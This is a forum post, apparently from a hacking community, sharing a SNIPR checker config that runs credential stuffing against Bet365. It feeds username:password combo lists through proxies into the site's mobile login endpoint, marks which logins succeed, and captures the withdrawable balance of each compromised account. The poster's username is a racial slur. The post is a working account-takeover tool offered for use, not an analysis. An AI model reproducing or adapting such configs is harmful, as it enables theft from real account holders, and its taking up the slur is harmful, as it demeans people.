• We just launched and are currently in beta. Join us as we build and grow the community.

[SNIPR] BET365 Capture

nigger123

Network Sniffer Expert
N Rep
0
0
0
Rep
0
N Vouches
0
0
0
Vouches
0
Posts
91
Likes
195
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
Hey guys i wuold like to share this config, works for snipr lasts version. Fresh as always
Enjoy
Code:
{
"General": {
"name": "Bet365",
"proxyType": "Proxies",
"comboType": "Username:Password"
},
"Requests": [
{
"actionUrl": "https://mobile.bet365.com/",
"method": "GET",
"userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
"contentType": "",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"referer": "",
"successKeys": [
"bet365 - Sports Betting, Casino, Poker, Games, Vegas, Bingo"
],
"variables": [
{
"name": "cook",
"type": "Regex",
"pattern": 'name="sessionID" value="([^"]*)',
"usedFor": "postData"
}
]
},
{
"actionUrl": "https://mobile.bet365.com/members/lp/default.aspx",
"method": "POST",
"userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
"contentType": "application/x-www-form-urlencoded",
"accept": "application/json, text/javascript, */*; q=0.01",
"referer": "https://mobile.bet365.com/",
"postData": 'txtUsername=<USER>&txtPassword=<PASS>&txtTKN=+cook+&txtType=47&DeviceId=&platform=2',
"successKeys": [
'"deviceId"'
],
"failureKeys": [
'authenticationMethodNotAllowed":false',
'"secondaryAuth":true'
],
},
{
"actionUrl": "https://members.bet365.com/Members/Authenticated/Bank/Balances/?lng=1&prd=1&rurl=https%3a%2f%2fmobile.bet365.com%2f&cnt=Sports%2f+Splash&oty=1&pid=8010&hasOpener=",
"method": "GET",
"userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
"contentType": "",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"referer": "",
"successKeys": [
'Withdrawable'
],
"failureKeys": [
'authenticationMethodNotAllowed":false',
'<span id="ctl00_main_ctl00_divPSBalance" class="col2">0.00<'
],
"captureParse": {
"patterns": [
{
"pattern": '<span id="ctl00_main_ctl00_divPSBalance" class="col2">([^<]*)<',
"returnString": "Balance: $+1+ "
}
]
}
}
]
}
Edited by mcifuentes, 02 November 2017 - 02:31 AM.
 

422,212

310,551

310,560

Top